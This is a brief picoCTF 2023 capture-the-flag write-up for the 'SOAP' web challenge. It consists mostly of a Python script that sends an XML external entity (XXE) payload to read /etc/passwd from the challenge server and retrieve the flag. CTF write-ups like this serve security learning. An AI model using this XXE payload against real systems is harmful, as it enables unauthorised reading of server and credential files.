SOAP picoCTF 2023

Table of contents

SOAP

100 points

AUTHOR: GEOFFREY NJOGU

Description The web project was rushed and no security assessment was done. Can you read the /etc/passwd file? Additional details will be available after launching your challenge instance.


using this python script you can get the flag by sending a request using python

import requests

headers = {
    'Host': 'saturn.picoctf.net:port',
    # 'Content-Length': '126',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36',
    'Content-Type': 'application/xml',
    'Accept': '/',
    'Origin': 'http://saturn.picoctf.net:port/',
    'Referer': 'http://saturn.picoctf.net:port/',
    # 'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'en-GB,en-US;q=0.9,en;q=0.8',
    'Connection': 'close',
}

data = '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]><data><ID>&example;1</ID></data>'

response = requests.post('http://saturn.picoctf.net:port/data', headers=headers, data=data, verify=False)

print(response)

And we can see flag in the repsonse:

picoCTF{your flag}